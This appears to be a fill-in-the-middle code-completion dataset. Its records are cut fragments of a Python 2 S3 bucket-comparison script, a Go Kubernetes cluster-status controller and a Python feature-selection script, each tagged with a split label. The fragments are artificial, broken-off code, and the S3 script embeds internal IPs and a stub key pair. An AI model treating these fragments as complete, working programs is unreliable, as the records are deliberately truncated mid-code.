#很可能是网络异常,关闭连接,让后续请求再新建连接。
myHTTPConnection.closeConnection()
time.sleep(.1)
#3.客户端配置了短连接
elif not myHTTPConnection.longConnection:
#python 2.7以下存在bug,不能直接使用close()方法关闭连接,不然客户端存在CLOSE_WAIT状态。
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
if __name__ == '__main__':
global MD5_Global_
printResult = time.time()
Service_1= '100.61.5.3'
Service_2 = '100.61.5.13'
#可以指定多个用户的AK,SK
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAMSTUBTEST000101',]
#server = '127.0.0.1', isSecure = False, timeout=80, serialNo = None, longConnection = False
server1_conn = s3PyCmd.MyHTTPConnection(host=Service_1, isSecure=False, timeout=600, serialNo=0, longConnection=False)
server2_conn = s3PyCmd.MyHTTPConnection(host=Service_2, isSecure=False, timeout=600, serialNo=0, longConnection=False)
totalObjectsOK = 0
totalObjectsErr = 0
totalReadErr = 0
userOK=True
for AKSK in User_AKSK:
print 'INFO: compare user %s' %AKSK
#列举用户所有桶
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListUserBuckets', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost = False, domainName = '', region='')
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Buckets_1 = make_request(s3Requesthandler1)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Buckets_2 = make_request(s3Requesthandler2)
#比较桶是否一致
Buckets_1 = getAllBucketsFromXML(Buckets_1)
Buckets_2 = getAllBucketsFromXML(Buckets_2)
logging.info('Buckets_1: %r, Buckets_2: %r' %(Buckets_1, Buckets_2))
print 'Buckets on Server1: %r, Buckets on Server2: %r' %(Buckets_1, Buckets_2)
Buckets = set(Buckets_1) & set(Buckets_2)
if not Buckets:
logging.error('find no same buckets exit')
print 'ERROR: no same buckets for this user'
break
open('Objects_1_List.txt','w').write('')
open('Objects_2_List.txt','w').write('')
#遍历桶
for bucket in | son
| conditional_block |
create.go | return microerror.Mask(err)
}
newObj, err := r.restClient.Get().AbsPath(accessor.GetSelfLink()).Do(ctx).Get()
if err != nil {
return microerror.Mask(err)
}
newAccessor, err := meta.Accessor(newObj)
if err != nil {
return microerror.Mask(err)
}
patches, err := r.computeCreateEventPatches(ctx, newObj)
if tenant.IsAPINotAvailable(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "tenant cluster is not available")
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling resource")
return nil
} else if err != nil {
return microerror.Mask(err)
}
if len(patches) > 0 {
err := r.applyPatches(ctx, newAccessor, patches)
if err != nil {
return microerror.Mask(err)
}
modified = true
}
return nil
}
b := r.backOffFactory()
n := func(err error, d time.Duration) {
r.logger.LogCtx(ctx, "level", "warning", "message", "retrying status patching due to error", "stack", fmt.Sprintf("%#v", err))
}
err := backoff.RetryNotify(o, b, n)
if err != nil {
return microerror.Mask(err)
}
}
if modified {
r.logger.LogCtx(ctx, "level", "debug", "message", "patched CR status")
reconciliationcanceledcontext.SetCanceled(ctx)
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling reconciliation")
} else {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not patch CR status")
}
return nil
}
func (r *Resource) computeCreateEventPatches(ctx context.Context, obj interface{}) ([]Patch, error) {
clusterStatus, err := r.clusterStatusFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentVersion := clusterStatus.LatestVersion()
desiredVersion, err := r.versionBundleVersionFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentNodeCount := len(clusterStatus.Nodes)
desiredNodeCount, err := r.nodeCountFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
var patches []Patch
// In case a CR might not have a status at all, we cannot work with it below.
// We have to initialize it upfront to be safe. Note that we only initialize
// fields that are managed by the statusresource library implementation. There
// might be other properties managed by external authorities who have to
// manage their own initialization.
patches = ensureDefaultPatches(clusterStatus, patches)
// After initialization the most likely implication is the tenant cluster being
// in a creation status. In case no other conditions are given and no nodes
// are known and no versions are set, we set the tenant cluster status to a
// creating condition.
{
notCreating := !clusterStatus.HasCreatingCondition()
conditionsEmpty := len(clusterStatus.Conditions) == 0
nodesEmpty := len(clusterStatus.Nodes) == 0
versionsEmpty := len(clusterStatus.Versions) == 0
if notCreating && conditionsEmpty && nodesEmpty && versionsEmpty {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreating))
}
}
// Once the tenant cluster is created we set the according status condition so
// the cluster status reflects the transitioning from creating to created.
{
isCreating := clusterStatus.HasCreatingCondition()
notCreated := !clusterStatus.HasCreatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isCreating && notCreated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreated))
}
}
// When we notice the current and the desired tenant cluster version differs,
// an update is about to be processed. So we set the status condition
// indicating the tenant cluster is updating now.
{
isCreated := clusterStatus.HasCreatedCondition()
notUpdating := !clusterStatus.HasUpdatingCondition()
versionDiffers := currentVersion != "" && currentVersion != desiredVersion
if isCreated && notUpdating && versionDiffers {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdating))
}
}
// Set the status cluster condition to updated when an update successfully
// took place. Precondition for this is the tenant cluster is updating and all
// nodes being known and all nodes having the same versions.
{
isUpdating := clusterStatus.HasUpdatingCondition()
notUpdated := !clusterStatus.HasUpdatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isUpdating && notUpdated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdated))
}
}
// Check all node versions held by the cluster status and add the version the
// tenant cluster successfully migrated to, to the historical list of versions.
{
hasTransitioned := clusterStatus.HasCreatedCondition() || clusterStatus.HasUpdatedCondition()
notSet := !clusterStatus.HasVersion(desiredVersion)
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if hasTransitioned && notSet && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/versions",
Value: clusterStatus.WithNewVersion(desiredVersion),
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status versions")
}
}
// Update the node status based on what the tenant cluster API tells us.
//
// TODO this is a workaround until we can read the node status information
// from the NodeConfig CR status. This is not possible right now because the
// NodeConfig CRs are still used for draining by older tenant clusters.
{
var k8sClient kubernetes.Interface
{
r.logger.LogCtx(ctx, "level", "debug", "message", "creating Kubernetes client for tenant cluster")
i, err := r.clusterIDFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
e, err := r.clusterEndpointFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
restConfig, err := r.tenantCluster.NewRestConfig(ctx, i, e)
if tenantcluster.IsTimeout(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not create Kubernetes client for tenant cluster")
r.logger.LogCtx(ctx, "level", "debug", "message", "waiting for certificates timed out")
} else if err != nil {
return nil, microerror.Mask(err)
}
clientsConfig := k8sclient.ClientsConfig{
Logger: r.logger | {
r.logger.LogCtx(ctx, "level", "debug", "message", "patching CR status")
// We process the status updates within its own backoff here to gurantee its
// execution independent of any eventual retries via the retry resource. It
// might happen that the reconciled object is not the latest version so any
// patch would fail. In case the patch fails we retry until we succeed. The
// steps of the backoff operation are as follows.
//
// Fetch latest version of runtime object.
// Compute patches for runtime object.
// Apply computed list of patches.
//
// In case there are no patches we do not need to do anything. So we prevent
// unnecessary API calls.
var modified bool
{
o := func() error {
accessor, err := meta.Accessor(obj)
if err != nil { | identifier_body |
|
create.go | version so any
// patch would fail. In case the patch fails we retry until we succeed. The
// steps of the backoff operation are as follows.
//
// Fetch latest version of runtime object.
// Compute patches for runtime object.
// Apply computed list of patches.
//
// In case there are no patches we do not need to do anything. So we prevent
// unnecessary API calls.
var modified bool
{
o := func() error {
accessor, err := meta.Accessor(obj)
if err != nil {
return microerror.Mask(err)
}
newObj, err := r.restClient.Get().AbsPath(accessor.GetSelfLink()).Do(ctx).Get()
if err != nil {
return microerror.Mask(err)
}
newAccessor, err := meta.Accessor(newObj)
if err != nil {
return microerror.Mask(err)
}
patches, err := r.computeCreateEventPatches(ctx, newObj)
if tenant.IsAPINotAvailable(err) | else if err != nil {
return microerror.Mask(err)
}
if len(patches) > 0 {
err := r.applyPatches(ctx, newAccessor, patches)
if err != nil {
return microerror.Mask(err)
}
modified = true
}
return nil
}
b := r.backOffFactory()
n := func(err error, d time.Duration) {
r.logger.LogCtx(ctx, "level", "warning", "message", "retrying status patching due to error", "stack", fmt.Sprintf("%#v", err))
}
err := backoff.RetryNotify(o, b, n)
if err != nil {
return microerror.Mask(err)
}
}
if modified {
r.logger.LogCtx(ctx, "level", "debug", "message", "patched CR status")
reconciliationcanceledcontext.SetCanceled(ctx)
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling reconciliation")
} else {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not patch CR status")
}
return nil
}
func (r *Resource) computeCreateEventPatches(ctx context.Context, obj interface{}) ([]Patch, error) {
clusterStatus, err := r.clusterStatusFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentVersion := clusterStatus.LatestVersion()
desiredVersion, err := r.versionBundleVersionFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentNodeCount := len(clusterStatus.Nodes)
desiredNodeCount, err := r.nodeCountFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
var patches []Patch
// In case a CR might not have a status at all, we cannot work with it below.
// We have to initialize it upfront to be safe. Note that we only initialize
// fields that are managed by the statusresource library implementation. There
// might be other properties managed by external authorities who have to
// manage their own initialization.
patches = ensureDefaultPatches(clusterStatus, patches)
// After initialization the most likely implication is the tenant cluster being
// in a creation status. In case no other conditions are given and no nodes
// are known and no versions are set, we set the tenant cluster status to a
// creating condition.
{
notCreating := !clusterStatus.HasCreatingCondition()
conditionsEmpty := len(clusterStatus.Conditions) == 0
nodesEmpty := len(clusterStatus.Nodes) == 0
versionsEmpty := len(clusterStatus.Versions) == 0
if notCreating && conditionsEmpty && nodesEmpty && versionsEmpty {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreating))
}
}
// Once the tenant cluster is created we set the according status condition so
// the cluster status reflects the transitioning from creating to created.
{
isCreating := clusterStatus.HasCreatingCondition()
notCreated := !clusterStatus.HasCreatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isCreating && notCreated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreated))
}
}
// When we notice the current and the desired tenant cluster version differs,
// an update is about to be processed. So we set the status condition
// indicating the tenant cluster is updating now.
{
isCreated := clusterStatus.HasCreatedCondition()
notUpdating := !clusterStatus.HasUpdatingCondition()
versionDiffers := currentVersion != "" && currentVersion != desiredVersion
if isCreated && notUpdating && versionDiffers {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdating))
}
}
// Set the status cluster condition to updated when an update successfully
// took place. Precondition for this is the tenant cluster is updating and all
// nodes being known and all nodes having the same versions.
{
isUpdating := clusterStatus.HasUpdatingCondition()
notUpdated := !clusterStatus.HasUpdatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isUpdating && notUpdated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdated))
}
}
// Check all node versions held by the cluster status and add the version the
// tenant cluster successfully migrated to, to the historical list of versions.
{
hasTransitioned := clusterStatus.HasCreatedCondition() || clusterStatus.HasUpdatedCondition()
notSet := !clusterStatus.HasVersion(desiredVersion)
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if hasTransitioned && notSet && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/versions",
Value: clusterStatus.WithNewVersion(desiredVersion),
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status versions")
}
}
// Update the node status based on what the tenant cluster API tells us.
//
// TODO this is a workaround until we can read the node status information
// from the NodeConfig CR status. This is not possible right now because the
// NodeConfig CRs are still used for draining by older tenant clusters.
{
var k8sClient kubernetes.Interface
{
r.logger.LogCtx(ctx, "level", "debug", "message", "creating Kubernetes client for tenant cluster")
i, err := r.clusterIDFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
e, err := r.clusterEndpointFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
restConfig, err := r.tenantCluster.NewRestConfig(ctx, i, e)
if tenantcluster.IsTimeout(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not create Kubernetes client for tenant cluster")
r.logger.LogCtx(ctx, "level", "debug", "message", "waiting for certificates timed out")
} else if err != nil {
return nil, microerror.Mask(err)
}
clientsConfig := k8sclient.ClientsConfig{
Logger: r.logger,
RestConfig: restConfig,
}
k8sClients, err := k8sclient.NewClients(clientsConfig)
if tenant.IsAPINotAvailable(err) || k8sclient.IsTimeout(err) {
r.logger.Debugf(ctx, "did not create Kubernetes client for tenant cluster, api is | {
r.logger.LogCtx(ctx, "level", "debug", "message", "tenant cluster is not available")
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling resource")
return nil
} | conditional_block |
create.go | latest version so any
// patch would fail. In case the patch fails we retry until we succeed. The
// steps of the backoff operation are as follows.
//
// Fetch latest version of runtime object.
// Compute patches for runtime object.
// Apply computed list of patches.
//
// In case there are no patches we do not need to do anything. So we prevent
// unnecessary API calls.
var modified bool
{
o := func() error {
accessor, err := meta.Accessor(obj)
if err != nil {
return microerror.Mask(err)
}
newObj, err := r.restClient.Get().AbsPath(accessor.GetSelfLink()).Do(ctx).Get()
if err != nil {
return microerror.Mask(err)
}
newAccessor, err := meta.Accessor(newObj)
if err != nil {
return microerror.Mask(err)
}
patches, err := r.computeCreateEventPatches(ctx, newObj)
if tenant.IsAPINotAvailable(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "tenant cluster is not available")
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling resource")
return nil
} else if err != nil {
return microerror.Mask(err)
}
if len(patches) > 0 {
err := r.applyPatches(ctx, newAccessor, patches)
if err != nil {
return microerror.Mask(err)
}
modified = true
}
return nil
}
b := r.backOffFactory()
n := func(err error, d time.Duration) {
r.logger.LogCtx(ctx, "level", "warning", "message", "retrying status patching due to error", "stack", fmt.Sprintf("%#v", err))
}
err := backoff.RetryNotify(o, b, n)
if err != nil {
return microerror.Mask(err)
}
}
if modified {
r.logger.LogCtx(ctx, "level", "debug", "message", "patched CR status")
reconciliationcanceledcontext.SetCanceled(ctx)
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling reconciliation")
} else {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not patch CR status")
}
return nil
}
func (r *Resource) computeCreateEventPatches(ctx context.Context, obj interface{}) ([]Patch, error) {
clusterStatus, err := r.clusterStatusFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentVersion := clusterStatus.LatestVersion()
desiredVersion, err := r.versionBundleVersionFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentNodeCount := len(clusterStatus.Nodes)
desiredNodeCount, err := r.nodeCountFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
var patches []Patch
// In case a CR might not have a status at all, we cannot work with it below.
// We have to initialize it upfront to be safe. Note that we only initialize
// fields that are managed by the statusresource library implementation. There
// might be other properties managed by external authorities who have to
// manage their own initialization.
patches = ensureDefaultPatches(clusterStatus, patches)
// After initialization the most likely implication is the tenant cluster being
// in a creation status. In case no other conditions are given and no nodes
// are known and no versions are set, we set the tenant cluster status to a
// creating condition.
{
notCreating := !clusterStatus.HasCreatingCondition()
conditionsEmpty := len(clusterStatus.Conditions) == 0
nodesEmpty := len(clusterStatus.Nodes) == 0
versionsEmpty := len(clusterStatus.Versions) == 0
if notCreating && conditionsEmpty && nodesEmpty && versionsEmpty {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreating))
}
}
// Once the tenant cluster is created we set the according status condition so
// the cluster status reflects the transitioning from creating to created.
{
isCreating := clusterStatus.HasCreatingCondition()
notCreated := !clusterStatus.HasCreatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isCreating && notCreated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreated))
}
}
// When we notice the current and the desired tenant cluster version differs,
// an update is about to be processed. So we set the status condition
// indicating the tenant cluster is updating now.
{
isCreated := clusterStatus.HasCreatedCondition()
notUpdating := !clusterStatus.HasUpdatingCondition()
versionDiffers := currentVersion != "" && currentVersion != desiredVersion
if isCreated && notUpdating && versionDiffers {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdating))
}
}
// Set the status cluster condition to updated when an update successfully
// took place. Precondition for this is the tenant cluster is updating and all
// nodes being known and all nodes having the same versions.
{
isUpdating := clusterStatus.HasUpdatingCondition()
notUpdated := !clusterStatus.HasUpdatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isUpdating && notUpdated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdated))
}
}
// Check all node versions held by the cluster status and add the version the
// tenant cluster successfully migrated to, to the historical list of versions.
{
hasTransitioned := clusterStatus.HasCreatedCondition() || clusterStatus.HasUpdatedCondition()
notSet := !clusterStatus.HasVersion(desiredVersion)
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if hasTransitioned && notSet && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/versions",
Value: clusterStatus.WithNewVersion(desiredVersion),
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status versions")
} | }
// Update the node status based on what the tenant cluster API tells us.
//
// TODO this is a workaround until we can read the node status information
// from the NodeConfig CR status. This is not possible right now because the
// NodeConfig CRs are still used for draining by older tenant clusters.
{
var k8sClient kubernetes.Interface
{
r.logger.LogCtx(ctx, "level", "debug", "message", "creating Kubernetes client for tenant cluster")
i, err := r.clusterIDFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
e, err := r.clusterEndpointFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
restConfig, err := r.tenantCluster.NewRestConfig(ctx, i, e)
if tenantcluster.IsTimeout(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not create Kubernetes client for tenant cluster")
r.logger.LogCtx(ctx, "level", "debug", "message", "waiting for certificates timed out")
} else if err != nil {
return nil, microerror.Mask(err)
}
clientsConfig := k8sclient.ClientsConfig{
Logger: r.logger,
RestConfig: restConfig,
}
k8sClients, err := k8sclient.NewClients(clientsConfig)
if tenant.IsAPINotAvailable(err) || k8sclient.IsTimeout(err) {
r.logger.Debugf(ctx, "did not create Kubernetes client for tenant cluster, api is | random_line_split |
|
create.go | (ctx context.Context, obj interface{}) error {
r.logger.LogCtx(ctx, "level", "debug", "message", "patching CR status")
// We process the status updates within its own backoff here to gurantee its
// execution independent of any eventual retries via the retry resource. It
// might happen that the reconciled object is not the latest version so any
// patch would fail. In case the patch fails we retry until we succeed. The
// steps of the backoff operation are as follows.
//
// Fetch latest version of runtime object.
// Compute patches for runtime object.
// Apply computed list of patches.
//
// In case there are no patches we do not need to do anything. So we prevent
// unnecessary API calls.
var modified bool
{
o := func() error {
accessor, err := meta.Accessor(obj)
if err != nil {
return microerror.Mask(err)
}
newObj, err := r.restClient.Get().AbsPath(accessor.GetSelfLink()).Do(ctx).Get()
if err != nil {
return microerror.Mask(err)
}
newAccessor, err := meta.Accessor(newObj)
if err != nil {
return microerror.Mask(err)
}
patches, err := r.computeCreateEventPatches(ctx, newObj)
if tenant.IsAPINotAvailable(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "tenant cluster is not available")
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling resource")
return nil
} else if err != nil {
return microerror.Mask(err)
}
if len(patches) > 0 {
err := r.applyPatches(ctx, newAccessor, patches)
if err != nil {
return microerror.Mask(err)
}
modified = true
}
return nil
}
b := r.backOffFactory()
n := func(err error, d time.Duration) {
r.logger.LogCtx(ctx, "level", "warning", "message", "retrying status patching due to error", "stack", fmt.Sprintf("%#v", err))
}
err := backoff.RetryNotify(o, b, n)
if err != nil {
return microerror.Mask(err)
}
}
if modified {
r.logger.LogCtx(ctx, "level", "debug", "message", "patched CR status")
reconciliationcanceledcontext.SetCanceled(ctx)
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling reconciliation")
} else {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not patch CR status")
}
return nil
}
func (r *Resource) computeCreateEventPatches(ctx context.Context, obj interface{}) ([]Patch, error) {
clusterStatus, err := r.clusterStatusFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentVersion := clusterStatus.LatestVersion()
desiredVersion, err := r.versionBundleVersionFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentNodeCount := len(clusterStatus.Nodes)
desiredNodeCount, err := r.nodeCountFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
var patches []Patch
// In case a CR might not have a status at all, we cannot work with it below.
// We have to initialize it upfront to be safe. Note that we only initialize
// fields that are managed by the statusresource library implementation. There
// might be other properties managed by external authorities who have to
// manage their own initialization.
patches = ensureDefaultPatches(clusterStatus, patches)
// After initialization the most likely implication is the tenant cluster being
// in a creation status. In case no other conditions are given and no nodes
// are known and no versions are set, we set the tenant cluster status to a
// creating condition.
{
notCreating := !clusterStatus.HasCreatingCondition()
conditionsEmpty := len(clusterStatus.Conditions) == 0
nodesEmpty := len(clusterStatus.Nodes) == 0
versionsEmpty := len(clusterStatus.Versions) == 0
if notCreating && conditionsEmpty && nodesEmpty && versionsEmpty {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreating))
}
}
// Once the tenant cluster is created we set the according status condition so
// the cluster status reflects the transitioning from creating to created.
{
isCreating := clusterStatus.HasCreatingCondition()
notCreated := !clusterStatus.HasCreatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isCreating && notCreated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreated))
}
}
// When we notice the current and the desired tenant cluster version differs,
// an update is about to be processed. So we set the status condition
// indicating the tenant cluster is updating now.
{
isCreated := clusterStatus.HasCreatedCondition()
notUpdating := !clusterStatus.HasUpdatingCondition()
versionDiffers := currentVersion != "" && currentVersion != desiredVersion
if isCreated && notUpdating && versionDiffers {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdating))
}
}
// Set the status cluster condition to updated when an update successfully
// took place. Precondition for this is the tenant cluster is updating and all
// nodes being known and all nodes having the same versions.
{
isUpdating := clusterStatus.HasUpdatingCondition()
notUpdated := !clusterStatus.HasUpdatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isUpdating && notUpdated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdated))
}
}
// Check all node versions held by the cluster status and add the version the
// tenant cluster successfully migrated to, to the historical list of versions.
{
hasTransitioned := clusterStatus.HasCreatedCondition() || clusterStatus.HasUpdatedCondition()
notSet := !clusterStatus.HasVersion(desiredVersion)
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if hasTransitioned && notSet && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/versions",
Value: clusterStatus.WithNewVersion(desiredVersion),
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status versions")
}
}
// Update the node status based on what the tenant cluster API tells us.
//
// TODO this is a workaround until we can read the node status information
// from the NodeConfig CR status. This is not possible right now because the
// NodeConfig CRs are still used for draining by older tenant clusters.
{
var k8sClient kubernetes.Interface
{
r.logger.LogCtx(ctx, "level", "debug", "message", "creating Kubernetes client for tenant cluster")
i, err := r.clusterIDFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
e, err := r.clusterEndpointFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
restConfig, err := r.tenantCluster.NewRestConfig(ctx, i, e)
if tenantcluster.IsTimeout(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not create Kubernetes client for tenant cluster")
r.logger.LogCtx(ctx, "level", "debug", "message", "waiting for certificates timed out")
} else if err != nil {
return nil, microerror.Mask(err)
}
clientsConfig := k8sclient | EnsureCreated | identifier_name |
|
kmeans_to_classifier_main.py | 'first_tkod_tifl_count',
'history_trail_cnt',
'teacher_after_4d_lp_cnt',
'l3m_hw_correct_rate',
# #
'teacher_fresh_hour',
"effectiveCommunicationCount",
"score_min",
'learning_target_lenght',
"teacher_staff_age_byopt",
'self_evaluation_length',
'l3m_avg_has_qz_lc',
'l3m_avg_prop_has_qz_lc',
'l3m_has_qz_lc',
'l3m_prop_has_qz_lc',
labels
]
print(len(df))
#数据预处理
df_train, df_btest= data_clean(df, min_date="2018-01-01", mid_date="2018-06-15", max_date="2018-06-30",label=labels)
df_train = df_train[select_columns]
df_btest = df_btest[select_columns]
print(len(df_btest))
print(df_train.columns)
print('正/负', str(len(df_train[df_train[labels] == 1])) + '/' + str(len(df_train[df_train[labels] == 0])))
t = len(df_train[df_train[labels] == 0]) / len(df_train[df_train[labels] == 1])
v = len(df_btest[df_btest[labels] == 0]) / len(df_btest[df_btest[labels] == 1])
print(t,v)
# 特征筛选
# from sklearn.feature_selection import RFECV
#
# dt_score = make_scorer(precision_score, pos_label=1)
# rf = RandomForestClassifier(n_estimators=24, criterion='gini', max_depth=7,
# random_state=5, class_weight={1: t},
# n_jobs=-1)
# selector = RFECV(rf, step=1, cv=5, scoring=dt_score, n_jobs=-1)
# selector = selector.fit(df_train.drop([labels], axis=1), df_train[labels])
#
